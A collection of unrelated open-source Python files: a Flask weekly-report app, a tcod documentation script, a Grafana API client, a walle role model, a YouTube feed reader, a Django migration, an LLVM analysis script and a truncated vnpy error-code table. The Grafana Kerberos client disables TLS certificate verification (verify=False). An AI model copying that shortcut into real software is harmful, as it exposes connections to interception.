deploy/app/report/views.py | mulsign/WeeklyReport | 131 | 12739855 | <gh_stars>100-1000
#coding:utf-8
from flask import render_template, redirect,request, url_for, \
current_app, flash, Markup
from flask_babelex import lazy_gettext as _
from flask_login import current_user
from datetime import datetime, timedelta, date
from . import report
from .forms import WriteForm, ReadDepartmentForm, \
ReadCrewForm, EmailReminderForm
from .. import db
from ..email import send_email
from ..models import Permission, User, Report, Department
from ..utils import get_week_count, permission_required, get_this_monday, \
get_last_week, get_last_week_start_at, get_last_week_end_at, get_last_week_content
@report.route('/write/', methods=['GET', 'POST'])
@permission_required(Permission.WRITE_REPORT)
def write():
form = WriteForm()
last_content_display = ""
report = Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(),
year=datetime.today().year
).first()
last_report = Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count() - 1,
year=datetime.today().year
).first()
if form.submit.data and form.validate_on_submit():
if report:
report.content = form.body.data.replace('<br>', '')
report.last_content = form.last_content.data.replace('<br>', '')
db.session.add(report)
else:
report = Report(
content=form.body.data.replace('<br>', ''),
last_content=form.last_content.data.replace('<br>', ''),
author_id=current_user.id,
week_count=get_week_count(),
year=datetime.today().year)
db.session.add(report)
db.session.commit()
flash(_('Successfully submitted report'))
current_app.logger.info(
'{} submitted report'.format(current_user.email))
return redirect(url_for('report.write'))
if report:
form.body.data = report.content
else:
form.body.data = current_app.config['DEFAULT_CONTENT']
if last_report:
form.last_content.data = last_report.content
last_content_display = get_last_week_content(last_report.content)
return render_template('report/write.html',
form=form,
week_count=get_week_count(),
start_at=get_this_monday(),
end_at=get_this_monday()+timedelta(days=6),
last_content_display=last_content_display)
@report.route('/write/last_week', methods=['GET', 'POST'])
@permission_required(Permission.WRITE_REPORT)
def write_last_week():
form = WriteForm()
last_content_display = ""
report = Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(get_last_week()),
year=get_last_week().year).first()
last_report = Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(get_last_week()) - 1,
year=get_last_week().year).first()
if form.submit.data and form.validate_on_submit():
if report:
report.content = form.body.data.replace('<br>', '')
report.last_content = form.last_content.data.replace('<br>', '')
else:
report = Report(
content=form.body.data.replace('<br>', ''),
author_id=current_user.id,
week_count=get_week_count(get_last_week()),
year=get_last_week().year)
db.session.add(report)
db.session.commit()
flash(_('Successfully submitted report'))
current_app.logger.info(
"{} edited last week's report".format(current_user.email))
return redirect(url_for('report.write_last_week'))
if report:
form.body.data = report.content
else:
form.body.data = current_app.config['DEFAULT_CONTENT']
if last_report:
form.last_content.data = last_report.content
last_content_display = get_last_week_content(last_report.content)
return render_template('report/write.html',
form=form,
week_count=get_week_count(get_last_week()),
start_at=get_last_week_start_at(),
end_at=get_last_week_end_at() - timedelta(days=1),
last_content_display=last_content_display)
@report.route('/read/', methods=['GET'])
@report.route('/read/<int:page_count>', methods=['GET'])
@permission_required(Permission.WRITE_REPORT)
def read(page_count=1):
if not Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(get_last_week()),
year=get_last_week().year).first():
flash(Markup(_("Do you want to <a href='/report/write/last_week'>"
"edit last week's report?</a>")))
pagination = Report.query.filter_by(author_id=current_user.id).order_by(
Report.year.desc()).order_by(Report.week_count.desc()).paginate(
page=page_count, per_page=current_app.config['PER_PAGE'])
if not Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(),
            year=datetime.today().year).first():
flash(_("You haven't submitted your weekly report"))
return render_template('report/read.html', pagination=pagination)
@report.route('/read/department/', methods=['GET', 'POST'])
@permission_required(Permission.READ_DEPARTMENT_REPORT)
def read_department():
form = ReadDepartmentForm()
user_choices = [('0', '*')]
user_choices.extend([(
str(user.id), user.username) for user in User.query.all()])
form.user.choices = user_choices
page = request.args.get('page', 1, type=int)
user_id = request.args.get('user', 0, type=int)
start_at = request.args.get('start_at', '', type=str)
end_at = request.args.get('end_at', '', type=str)
start_at = get_last_week_start_at() if not start_at \
else datetime.strptime(start_at[:10], '%Y-%m-%d')
end_at = date.today()+timedelta(hours=24) if not end_at \
else datetime.strptime(end_at[:10], '%Y-%m-%d')
form.start_at.data = start_at
form.end_at.data = end_at
form.user.data = str(user_id)
ids = [user.id for user in User.query.filter_by(
department_id=current_user.department_id)]
qst = Report.query.filter_by().filter(
Report.created_at.between(start_at, end_at)).filter(
Report.author_id.in_(ids))
if user_id:
qst = qst.filter_by(author_id=user_id)
if form.validate_on_submit():
pass
pagination = qst.filter_by().order_by(Report.year.desc()).order_by(
Report.week_count.desc()).order_by(Report.created_at.desc()).paginate(
page=page, per_page=current_app.config['PER_PAGE'])
return render_template('report/read_department.html',
form=form,
pagination=pagination)
@report.route('/read/crew/', methods=['GET', 'POST'])
@permission_required(Permission.READ_ALL_REPORT)
def read_crew():
form = ReadCrewForm()
user_choices = [('0', '*')]
department_choices = user_choices[:]
for dept in Department.query.all():
department_choices.extend([(str(dept.id), dept.name)])
user_choices.extend([(str(user.id), user.username) for user in
User.query.filter_by(department_id=dept.id)])
form.user.choices = user_choices
form.department.choices = department_choices
page = request.args.get('page', 1, type=int)
department_id = request.args.get('department', 0, type=int)
user_id = request.args.get('user', 0, type=int)
start_at = request.args.get('start_at', '', type=str)
end_at = request.args.get('end_at', '', type=str)
start_at = get_last_week_start_at() if not start_at \
else datetime.strptime(start_at[:10], '%Y-%m-%d')
end_at = date.today()+timedelta(hours=24) if not end_at \
else datetime.strptime(end_at[:10], '%Y-%m-%d')
form.start_at.data = start_at
form.end_at.data = end_at
form.user.data = str(user_id)
form.department.data = str(department_id)
qst = Report.query.filter_by().filter(
Report.created_at.between(start_at, end_at))
if department_id:
ids = [user.id for user in User.query.filter_by(
department_id=department_id)]
qst = qst.filter(Report.author_id.in_(ids))
if user_id:
qst = qst.filter_by(author_id=user_id)
if form.validate_on_submit():
pass
pagination = qst.filter_by().order_by(Report.year.desc()).order_by(
Report.week_count.desc()).order_by(Report.created_at.desc()).paginate(
page=page, per_page=current_app.config['PER_PAGE'])
return render_template('report/read_crew.html',
form=form,
pagination=pagination)
@report.route('/statistics/department/', methods=['GET'])
@permission_required(Permission.READ_DEPARTMENT_REPORT)
def statistics_department():
qst = Report.query.filter_by()
dept_users = [user for user in User.query.filter_by(
department_id=current_user.department_id) if not user.is_ignored]
ids = [user.id for user in dept_users]
if ids:
qst = qst.filter(Report.author_id.in_(ids))
else:
qst = qst.filter(False)
submitted_users = [
report.author for report in qst.filter_by(
week_count=get_week_count(),
year=datetime.today().year)]
unsubmitted_users = set(dept_users) - set(submitted_users)
data = {'已交': len(submitted_users),
'未交': len(unsubmitted_users)}
names = {'has_submitted': [user.username for user in submitted_users],
'not_yet': [user.username for user in unsubmitted_users]}
return render_template('report/statistics_department.html',
data=data,
names=names,
week_count=get_week_count(),
start_at=get_this_monday(),
end_at=get_this_monday() + timedelta(days=6))
@report.route('/statistics/department/last_week', methods=['GET'])
@permission_required(Permission.READ_DEPARTMENT_REPORT)
def statistics_department_last_week():
qst = Report.query.filter_by()
dept_users = [user for user in User.query.filter_by(
department_id=current_user.department_id) if not user.is_ignored]
ids = [user.id for user in dept_users]
if ids:
qst = qst.filter(Report.author_id.in_(ids))
else:
qst = qst.filter(False)
submitted_users = [
report.author for report in qst.filter_by(
week_count=get_week_count(get_last_week()),
year=get_last_week().year)]
unsubmitted_users = set(dept_users) - set(submitted_users)
data = {'已交': len(submitted_users),
'未交': len(unsubmitted_users)}
names = {'has_submitted': [user.username for user in submitted_users],
'not_yet': [user.username for user in unsubmitted_users]}
return render_template('report/statistics_department.html',
data=data,
names=names,
week_count=get_week_count(get_last_week()),
start_at=get_last_week_start_at(),
end_at=get_last_week_end_at() - timedelta(days=1))
@report.route('/statistics/crew/', methods=['GET', 'POST'])
@permission_required(Permission.READ_ALL_REPORT)
def statistics_crew():
stash = []
contrast = {}
reminder_emails = set()
form = EmailReminderForm()
for dept in Department.query.filter_by():
qst = Report.query.filter_by()
dept_users = [user for user in User.query.filter_by(
department_id=dept.id) if not user.is_ignored]
ids = [user.id for user in dept_users]
if ids:
qst = qst.filter(Report.author_id.in_(ids))
else:
qst = qst.filter(False)
submitted_users = [
report.author for report in qst.filter_by(
week_count=get_week_count(),
year=datetime.today().year)]
unsubmitted_users = set(dept_users)-set(submitted_users)
reminder_emails |= set([user.email for user in unsubmitted_users])
names = {'has_submitted': [user.username for user in submitted_users],
'not_yet': [user.username for user in unsubmitted_users]}
stash.append({'names': names,
'dept_name': dept.name})
contrast[dept.name] = len(dept_users) - len(submitted_users)
if form.validate_on_submit():
        subject = 'Reminder of Report of week ' + str(get_week_count()) + \
' From:' + str(get_this_monday()) + \
' To:' + str(get_this_monday() + timedelta(days=6))
send_email(reminder_emails, subject,
'email/reminder',
user=current_user,
week_count=get_week_count(),
start_at=get_this_monday(),
end_at=get_this_monday() + timedelta(days=6))
flash(_('Email has been sent to:') + '\n{}'.format(reminder_emails))
return render_template('report/statistics_crew.html',
contrast=contrast,
stash=stash,
week_count=get_week_count(),
form=form,
start_at=get_this_monday(),
end_at=get_this_monday() + timedelta(days=6))
@report.route('/statistics/crew/last_week', methods=['GET', 'POST'])
@permission_required(Permission.READ_ALL_REPORT)
def statistics_crew_last_week():
stash = []
contrast = {}
reminder_emails = set()
form = EmailReminderForm()
for dept in Department.query.filter_by():
qst = Report.query.filter_by()
dept_users = [user for user in User.query.filter_by(
department_id=dept.id) if not user.is_ignored]
ids = [user.id for user in dept_users]
if ids:
qst = qst.filter(Report.author_id.in_(ids))
else:
qst = qst.filter(False)
submitted_users = [
report.author for report in qst.filter_by(
week_count=get_week_count(get_last_week()),
year=get_last_week().year)]
unsubmitted_users = set(dept_users)-set(submitted_users)
reminder_emails |= set([user.email for user in unsubmitted_users])
names = {'has_submitted': [user.username for user in submitted_users],
'not_yet': [user.username for user in unsubmitted_users]}
stash.append({'names': names,
'dept_name': dept.name})
contrast[dept.name] = len(dept_users) - len(submitted_users)
if form.validate_on_submit():
        subject = 'Reminder of Report of week ' + str(get_week_count(get_last_week())) + \
' From:' + str(get_last_week_start_at()) + \
' To:' + str(get_last_week_end_at() - timedelta(days=1))
send_email(reminder_emails, subject,
'email/reminder',
user=current_user,
week_count=get_week_count(get_last_week()),
start_at=get_last_week_start_at(),
end_at=get_last_week_end_at() - timedelta(days=1))
flash(_('Email has been sent to:') + '\n{}'.format(reminder_emails))
return render_template('report/statistics_crew.html',
contrast=contrast,
stash=stash,
form=form,
week_count=get_week_count(get_last_week()),
start_at=get_last_week_start_at(),
end_at=get_last_week_end_at() - timedelta(days=1))
|
scripts/generate_charmap_table.py | hirnimeshrampuresoftware/python-tcod | 231 | 12739870 | #!/usr/bin/env python3
"""This script is used to generate the tables for `charmap-reference.rst`.
Uses the tabulate module from PyPI.
"""
import argparse
import unicodedata
from typing import Iterable, Iterator
from tabulate import tabulate
import tcod.tileset
def get_charmaps() -> Iterator[str]:
"""Return an iterator of the current character maps from tcod.tilest."""
for name in dir(tcod.tileset):
if name.startswith("CHARMAP_"):
yield name[len("CHARMAP_") :].lower()
def escape_rst(string: str) -> str:
"""Escape RST symbols and disable Sphinx smart quotes."""
return (
string.replace("\\", "\\\\")
.replace("*", "\\*")
.replace("|", "\\|")
.replace("`", "\\`")
.replace("'", "\\'")
.replace('"', '\\"')
)
def generate_table(charmap: Iterable[int]) -> str:
"""Generate and RST table for `charmap`."""
headers = ("Tile Index", "Unicode", "String", "Name")
table = []
for i, ch in enumerate(charmap):
hex_len = len(f"{ch:x}")
if hex_len % 2: # Prevent an odd number of hex digits.
hex_len += 1
try:
name = unicodedata.name(chr(ch))
except ValueError:
# Skip names rather than guessing, the official names are enough.
name = ""
string = escape_rst(f"{chr(ch)!r}")
table.append((i, f"0x{ch:0{hex_len}X}", string, name))
return tabulate(table, headers, tablefmt="rst")
def main() -> None:
parser = argparse.ArgumentParser(
description="Generate an RST table for a tcod character map.",
)
parser.add_argument(
"charmap",
action="store",
choices=list(get_charmaps()),
type=str,
help="which character map to generate a table from",
)
parser.add_argument(
"-o",
"--out-file",
action="store",
type=argparse.FileType("w", encoding="utf-8"),
default="-",
help="where to write the table to (stdout by default)",
)
args = parser.parse_args()
charmap = getattr(tcod.tileset, f"CHARMAP_{args.charmap.upper()}")
with args.out_file as f:
f.write(generate_table(charmap))
if __name__ == "__main__":
main()
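# Example invocation (assumes tabulate is installed and the script is run from
# the repository root; "cp437" corresponds to tcod.tileset.CHARMAP_CP437):
#
#     python scripts/generate_charmap_table.py cp437 -o charmap-cp437.rst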
|
grafana_dashboards/client/connection.py | Rvhappen/grafana-dashboard-builder | 131 | 12739876 | # -*- coding: utf-8 -*-
# Copyright 2015-2019 grafana-dashboard-builder contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import base64
import json
import logging
try:
from cookielib import CookieJar
except ImportError:
from http.cookiejar import CookieJar
try:
from urllib2 import build_opener, HTTPHandler, HTTPSHandler, HTTPCookieProcessor, HTTPDefaultErrorHandler, \
Request, BaseHandler
except ImportError:
from urllib.request import build_opener, HTTPHandler, HTTPSHandler, HTTPCookieProcessor, HTTPDefaultErrorHandler, \
Request, BaseHandler
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
import requests
from requests_kerberos import HTTPKerberosAuth
__author__ = '<NAME> <<EMAIL>>'
logger = logging.getLogger(__name__)
class BaseConnection(object):
_headers = {
'Content-type': 'application/json',
'Accept': 'application/json'
}
def __init__(self, host, auth_header, debug=0):
self._host = host
self._headers['Authorization'] = auth_header
self._opener = build_opener(HTTPHandler(debuglevel=debug),
HTTPSHandler(debuglevel=debug),
HTTPCookieProcessor(CookieJar()),
LoggingHandler(),
HTTPDefaultErrorHandler())
def make_request(self, uri, body=None):
request = Request('{0}{1}'.format(self._host, uri),
json.dumps(body).encode('utf-8') if body else None,
headers=self._headers)
response_body = self._opener.open(request).read()
return {} if (response_body is None or response_body == '') else json.loads(response_body)
class BasicAuthConnection(BaseConnection):
def __init__(self, username, password, host, debug=0):
logger.debug('Creating new connection with username=%s host=%s', username, host)
base64string = base64.encodestring(('%s:%s' % (username, password)).encode('utf-8')).replace(b'\n', b'')
super(BasicAuthConnection, self).__init__(host, b'Basic ' + base64string, debug)
class BearerAuthConnection(BaseConnection):
def __init__(self, token, host, debug=0):
logger.debug('Creating new connection with token=%s host=%s', token[:5], host)
super(BearerAuthConnection, self).__init__(host, 'Bearer %s' % token.strip(), debug)
class LoggingHandler(BaseHandler):
def __init__(self):
pass
# noinspection PyMethodMayBeStatic
def http_request(self, request):
path = urlparse(request.get_full_url()).path
logger.debug('Sending request: method=%s uri=%s', request.get_method(), path)
return request
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def http_response(self, request, response):
logger.debug('Response received: status=%s msg=%s', response.getcode(), response.msg)
return response
https_request = http_request
https_response = http_response
class KerberosConnection(object):
def __init__(self, host):
logger.debug('Creating new kerberos connection with host=%s', host)
self._host = host
def make_request(self, uri, body=None):
response = requests.post('{0}{1}'.format(self._host, uri), json=body, auth=HTTPKerberosAuth(), verify=False)
return response.json()
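# Usage sketch (not part of the original module): the token and host below are
# placeholders, and '/api/search' is Grafana's dashboard search endpoint.
def _example_list_dashboards():
    """Build a bearer-token connection and list dashboards via the search API."""
    connection = BearerAuthConnection('some-api-token', 'http://grafana.example.com')
    return connection.make_request('/api/search')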
|
walle/model/role.py | hujiangyihao/test | 12,282 | 12739895 | # -*- coding: utf-8 -*-
"""
walle-web
:copyright: © 2015-2019 walle-web.io
:created time: 2018-11-26 16:06:44
:author: <EMAIL>
"""
from datetime import datetime
from sqlalchemy import String, Integer, DateTime
from walle.model.database import SurrogatePK
from walle.model.database import db, Model
from walle.model.user import UserModel
from walle.service.extensions import permission
from walle.service.rbac.role import *
class RoleModel(object):
_role_super = 'SUPER'
_role_owner = 'OWNER'
_role_master = 'MASTER'
_role_developer = 'DEVELOPER'
_role_reporter = 'REPORTER'
@classmethod
def list(cls):
roles = [
{'id': cls._role_super, 'name': '超级管理员'},
{'id': cls._role_owner, 'name': '空间所有者'},
{'id': cls._role_master, 'name': '项目管理员'},
{'id': cls._role_developer, 'name': '开发者'},
{'id': cls._role_reporter, 'name': '访客'},
]
return roles, len(roles)
@classmethod
def item(cls, role_id):
return None
@classmethod
def menu_url(cls, url):
if url == '/':
return url
prefix = 'admin' if current_user.role == SUPER else session['space_info']['name']
return '/' + prefix + url
|
Youtube Trending Feed Scrapper/scrap_reader.py | avinashkranjan/PraticalPythonProjects | 930 | 12739905 | # Youtube Trending Feed Reader
# Written by XZANATOL
from optparse import OptionParser
from pymongo import MongoClient
import pandas as pd
import sys
# Help menu
usage = """
<Script> [Options]
[Options]
-h, --help Shows this help message and exit
-c, --csv Reads data from "Youtube.csv" file
-m, --mongo Reads data from MongoDB
"""
# Load args
parser = OptionParser()
parser.add_option("-c", "--csv", action="store_true", dest="csv",
help="Saves extracted contents to a CSV file.")
parser.add_option("-m", "--mongo", action="store_true",
dest="mongo", help="Saves extracted contents to a MongoDB.")
def read_mongo():
# Connect to service
client = MongoClient("127.0.0.1")
# Create an object
db = client.Youtube.trending
return db.find() # Return all values
def read_csv():
    # read database
df = pd.read_csv("Youtube.csv")
data = []
for index, row in df.iterrows():
data.append(row) # Append each dictionary to the list
return data # Return all values
def display(data):
i = 0
for card in data:
# For every 10 cards print section
if i % 10 == 0:
c = input("Show Section? [y/n] > ")
if c.lower() == "y":
print("***********************************")
print(f"""{card["section"]} section""")
print("***********************************")
else:
sys.exit() # If had enough of reading
        i += 1  # Increment
print("Title:", card["title"])
print("Link:", card["link"])
print("Channel:", card["channel"])
print("Views:", card["views"])
print("Time:", card["date"])
print("==============================================")
if __name__ == "__main__":
(options, args) = parser.parse_args()
# Flags
csv = options.csv
mongo = options.mongo
# Validate flags
if not (bool(csv) ^ bool(mongo)): # XNOR Gate
print(usage)
sys.exit()
if mongo:
data = read_mongo()
else:
data = read_csv()
display(data)
|
jarbas/chamber_of_deputies/migrations/0004_alter_field_names_following_toolbox_renamings.py | vbarceloscs/serenata-de-amor | 3,001 | 12739920 |
from django.contrib.postgres.fields import ArrayField
from django.db import migrations, models
def convert_reimbursement_numbers_to_array(apps, schema_editor):
Reimbursement = apps.get_model("chamber_of_deputies", "Reimbursement")
for record in Reimbursement.objects.all():
record.numbers = record.reimbursement_numbers.split(", ")
record.save()
def convert_reimbursement_numbers_to_array_rollback(apps, schema_editor):
Reimbursement = apps.get_model("chamber_of_deputies", "Reimbursement")
for record in Reimbursement.objects.all():
record.reimbursement_numbers = ", ".join(record.numbers)
record.save()
class Migration(migrations.Migration):
dependencies = [
("chamber_of_deputies", "0003_remove_available_in_latest_dataset_field")
]
operations = [
migrations.AlterField(
model_name="reimbursement",
name="document_id",
field=models.IntegerField(db_index=True),
),
migrations.AlterField(
model_name="reimbursement",
name="supplier",
field=models.CharField(max_length=256),
),
migrations.AlterField(
model_name="reimbursement",
name="issue_date",
field=models.DateField(null=True),
),
migrations.RenameField(
model_name="reimbursement",
old_name="total_reimbursement_value",
new_name="total_value",
),
migrations.RenameField(
model_name="reimbursement",
old_name="subquota_id",
new_name="subquota_number",
),
migrations.AddField(
model_name="reimbursement",
name="numbers",
field=ArrayField(models.CharField(max_length=128), default=list),
),
migrations.RunPython(
convert_reimbursement_numbers_to_array,
convert_reimbursement_numbers_to_array_rollback,
),
migrations.RemoveField(model_name="reimbursement", name="net_values"),
migrations.RemoveField(
model_name="reimbursement", name="reimbursement_numbers"
),
migrations.RemoveField(model_name="reimbursement", name="reimbursement_values"),
]
|
llvm/utils/Target/ARM/analyze-match-table.py | medismailben/llvm-project | 4,812 | 12739933 | #!/usr/bin/env python
from __future__ import print_function
def analyze_match_table(path):
# Extract the instruction table.
data = open(path).read()
start = data.index("static const MatchEntry MatchTable")
end = data.index("\n};\n", start)
lines = data[start:end].split("\n")[1:]
# Parse the instructions.
insns = []
for ln in lines:
ln = ln.split("{", 1)[1]
ln = ln.rsplit("}", 1)[0]
a,bc = ln.split("{", 1)
b,c = bc.split("}", 1)
code, string, converter, _ = [s.strip()
for s in a.split(",")]
items = [s.strip() for s in b.split(",")]
_,features = [s.strip() for s in c.split(",")]
assert string[0] == string[-1] == '"'
string = string[1:-1]
insns.append((code,string,converter,items,features))
# For every mnemonic, compute whether or not it can have a carry setting
# operand and whether or not it can have a predication code.
mnemonic_flags = {}
for insn in insns:
mnemonic = insn[1]
items = insn[3]
flags = mnemonic_flags[mnemonic] = mnemonic_flags.get(mnemonic, set())
flags.update(items)
mnemonics = set(mnemonic_flags)
ccout_mnemonics = set(m for m in mnemonics
if 'MCK_CCOut' in mnemonic_flags[m])
condcode_mnemonics = set(m for m in mnemonics
if 'MCK_CondCode' in mnemonic_flags[m])
noncondcode_mnemonics = mnemonics - condcode_mnemonics
print(' || '.join('Mnemonic == "%s"' % m
for m in ccout_mnemonics))
print(' || '.join('Mnemonic == "%s"' % m
for m in noncondcode_mnemonics))
def main():
import sys
if len(sys.argv) == 1:
import os
from lit.Util import capture
llvm_obj_root = capture(["llvm-config", "--obj-root"])
file = os.path.join(llvm_obj_root,
"lib/Target/ARM/ARMGenAsmMatcher.inc")
elif len(sys.argv) == 2:
file = sys.argv[1]
else:
raise NotImplementedError
analyze_match_table(file)
if __name__ == '__main__':
main()
|
vnpy/api/tap/error_codes.py | iamyyl/vnpy | 323 | 12739948 | error_map = {
0: None,
-1: "连接服务失败",
-2: "链路认证失败",
-3: "主机地址不可用",
-4: "发送数据错误",
-5: "测试编号不合法",
-6: "没准备好测试网络",
-7: "当前网络测试还没结束",
-8: "没用可用的接入前置",
-9: "数据路径不可用",
-10: "重复登录",
-11: "内部错误",
-12: "上一次请求还没有结束",
-13: "输入参数非法",
-14: "授权码不合法",
-15: "授权码超期",
-16: "授权码类型不匹配",
-17: "API还没有准备好",
-18: "UDP端口监听失败",
-19: "UDP正在监听",
-20: "接口未实现",
-21: "每次登陆只允许调用一次",
-22: "超过下单频率。",
-10000: "输入数据为NULL",
-10001: "输入错误的:TAPIYNFLAG",
-10002: "输入错误的:TAPILOGLEVEL",
-10003: "输入错误的:TAPICommodityType",
-10004: "输入错误的:TAPICallOrPutFlagType",
-12001: "输入错误的:TAPIAccountType",
-12003: "输入错误的:TAPIAccountState",
-12004: "输入错误的:TAPIAccountFamilyType",
-12005: "输入错误的:TAPIOrderTypeType",
-12006: "输入错误的:TAPIOrderSourceType",
-12007: "输入错误的:TAPITimeInForceType",
-12008: "输入错误的:TAPISideType",
-12009: "输入错误的:TAPIPositionEffectType",
-12010: "输入错误的:TAPIHedgeFlagType",
-12011: "输入错误的:TAPIOrderStateType",
-12012: "输入错误的:TAPICalculateModeType",
-12013: "输入错误的:TAPIMatchSourceType",
-12014: "输入错误的:TAPIOpenCloseModeType",
-12015: "输入错误的:TAPIFutureAlgType",
-12016: "输入错误的:TAPIOptionAlgType",
-12017: "输入错误的:TAPIBankAccountLWFlagType",
-12021: "输入错误的:TAPIMarginCalculateModeType",
-12022: "输入错误的:TAPIOptionMarginCalculateModeType",
-12023: "输入错误的:TAPICmbDirectType",
-12024: "输入错误的:TAPIDeliveryModeType",
-12025: "输入错误的:TAPIContractTypeType",
-12035: "输入错误的:TAPITacticsTypeType",
-12036: "输入错误的:TAPIORDERACT",
-12041: "输入错误的:TAPITriggerConditionType",
-12042: "输入错误的:TAPITriggerPriceTypeType",
-12043: "输入错误的:TAPITradingStateType",
-12044: "输入错误的:TAPIMarketLevelType",
-12045: "输入错误的:TAPIOrderQryTypeType",
1: "主动断开",
2: "被动断开",
3: "读错误",
4: "写错误",
5: "缓冲区满",
6: "异步操作错误",
7: "解析数据错误",
8: "连接超时",
9: "初始化失败",
10: "已经连接",
11: "工作线程已结束",
12: "操作正在进行,请稍后重试",
13: "心跳检测失败",
10001: "登录过程执行错误",
10002: "登录用户不存在",
10003: "需要进行动态认证",
10004: "登录用户未授权",
10005: "登录模块不正确",
10006: "需要强制修改密码",
10007: "登录状态禁止登陆",
10008: "登录密码不正确",
10009: "没有该模块登录权限",
10010: "登录数量超限",
10011: "登录用户不在服务器标识下可登录用户列表中",
10012: "登录用户已被冻结",
10013: "密码错误,用户冻结",
10014: "客户状态不允许登录",
10015: "需要进行二次认证",
10016: None,
10017: None,
10018: "登录用户密码超过有效天数",
10101: "登录用户信息查询失败",
11001: "数据库操作失败",
11501: "登录用户下属所有资金账号查询失败",
11701: "登录用户密码修改失败",
11702: "登录用户密码修改失败——原始密码错误",
11703: "登录用户密码修改失败——不能与前n次密码相同",
11704: "新密码不符合密码复杂度要求",
20201: "资金账号信息查询失败",
20701: "客户交易编码查询失败",
22801: "合约信息查询失败",
22901: "特殊期权标的查询失败",
25501: "品种委托类型查询失败",
25601: "品种委托时间有效性查询失败",
28901: "用户下单频率查询失败",
60001: "资金账号不存在",
60002: "资金账号状态不正确",
60003: "资金账号交易中心不一致",
60004: "资金账号无期权交易权限",
60005: "资金账号无品种交易权限",
60006: "资金账号无开仓权限",
60007: "资金账号风控项检查失败",
60011: "下单无效的合约",
60021: "客户权限禁止交易",
60022: "客户品种分组禁止交易",
60023: "客户合约特设禁止交易",
60024: "系统权限禁止交易",
60031: "持仓量超过最大限制",
60032: "下单超过单笔最大量",
60033: "下单合约无交易路由",
60034: "委托价格超出偏离范围",
60035: "超过GiveUp最大持仓量",
60036: "下单自动审核失败",
60037: "LME未准备就绪",
60038: "平仓方式错误",
60039: "下单对应的父账号资金不足",
60040: "互换单的合约格式错误",
60051: "下单资金不足",
60052: "手续费参数错误",
60053: "保证金参数错误",
60061: "撤单无此系统号",
60062: "此状态不允许撤单",
60063: "录单不允许撤单",
60071: "此状态不允许改单",
60072: "人工单不允许改单",
60081: "已删除报单不能转移",
60082: "人工单不允许改单",
60091: "录单重复",
60092: "保证金参数错误",
60100: "操作账号只可查询",
60101: "合约行情价格修改失败",
60102: "即使子帐号又是做市商不能应价",
60103: "下单找不到交易编码",
60104: "操作账号只可开仓",
60105: "操作账号没有上期挂单查询权限",
60106: "限期有效单不能小于当前交易日",
60107: "该编码不允许申请或拆分组合",
60108: "非本服务器标记下的账号不允许操作",
60109: "行权或弃权量超过可用量",
60110: "没有订单审核权限",
60111: "下单超过上手单笔最大量",
60115: "非大连应价单不允许两笔委托量不一致",
60117: "申请不允许重复提交",
60118: "超过账号下单频率限制",
60119: "组合表不存在的组合方向或投保标志",
61001: "订单操作频率过高",
61002: "委托查询返回前不能进行下次查询",
72001: "超过行情最大总订阅数",
72002: "超过该交易所行情最大订阅数",
72101: "没有该行情的订阅权限",
72102: "没有该交易所下行情的订阅权限",
72103: "品种不存在",
72104: "合约可能不存在",
83001: "不支持的行情协议",
14001: "二次验证失败",
14002: "二次验证超时",
11000: "数据库连接失败",
11002: "不允许一对多",
11003: "删除失败-存在关联信息,",
11004: "删除分组失败-分组有下属或在操作员下属中",
12001: "登录用户密码修改失败-原始密码错误",
12002: "登录用户密码修改失败-不能与前n次密码相同",
12003: "登录用户密码修改失败-新密码不符合密码复杂度要求",
13001: "一个币种组只能设置一个基币",
13002: "基币只能是美元或港币",
60012: "LME未准备就绪",
60013: "不支持的下单类型",
60014: "错误的埋单类型",
60015: "不合法的委托类型",
60025: "客户权限只可平仓",
60026: "客户合约特设只可平仓",
60027: "系统权限只可平仓",
60028: "只可平仓提前天数限制只可平仓",
60029: "客户品种风控权限禁止交易",
60030: "客户品种风控权限只可平仓",
60041: "未登录网关",
60042: "未找到网关信息",
60054: "总基币资金不足",
60055: "超过保证金额度",
60056: "总基币超过开仓比例限制",
60057: "独立币种组超过开仓比例限制",
60058: "风险阵列参数错误",
60073: "风险报单不允许改单",
60074: "成交量大于改单量",
60075: "预埋单不允许改单",
60112: "下单超过上手最大持仓量",
60121: "开平方式错误",
60122: "委托平仓持仓不足",
60123: "成交平仓失败",
60131: "未找到本地委托",
60132: "与网关断开连接",
60141: "录单成交重复",
60142: "录单成交未找到对应委托",
60143: "录单成交合约不存在",
60144: "录单成交参数错误",
60145: "录单成交委托状态错误",
60151: "成交删除未找到成交",
60152: "此状态成交不可删",
60161: "不允许录入此状态订单",
60162: "错误的修改订单请求",
60163: "订单不可删,存在对应成交",
60164: "不合法的委托状态",
60165: "此状态不允许订单转移",
60166: "订单不允许删除",
60171: "做市商双边撤单未找到委托",
60172: "做市商双边撤单客户不一致",
60173: "做市商双边撤单品种不一致",
60174: "做市商双边撤单合约不一致",
60175: "做市商双边撤单买卖方向相同",
60176: "做市商双边撤单买卖方向错误",
60177: "做市商单边检查未通过",
60181: "埋单激活失败,订单未找到",
60182: "埋单激活失败,非有效状态",
80001: "网关未就绪,未连接上手",
80002: "品种错误",
80003: "合约错误",
80004: "报单字段有误",
80005: "价格不合法",
80006: "数量不合法",
80007: "报单类型不合法",
80008: "委托模式不合法",
80009: "委托不存在(改单、撤单)",
80010: "发送报单失败",
80011: "被上手拒绝",
90001: "前置不允许该模块登录",
90002: "一次请求太多数据",
90003: "前置没有所要数据",
90004: "所查询的操作员信息不存在",
90011: "前置与交易断开",
90012: "前置与管理断开",
90021: "下属资金账号不存在",
90022: "该操作员不允许交易",
90023: "查询频率过快",
90024: "该授权不予许登录",
90025: "自成交验证不通过",
-23: "查询频率太快。",
-24: "不符合调用条件。",
-25: "改单撤单时没有找到对应订单。",
-26: "日志路径为空。",
-27: "打开日志文件失败",
-28: "没有交易员登录权限",
-29: "没有订单录入或者成交录入",
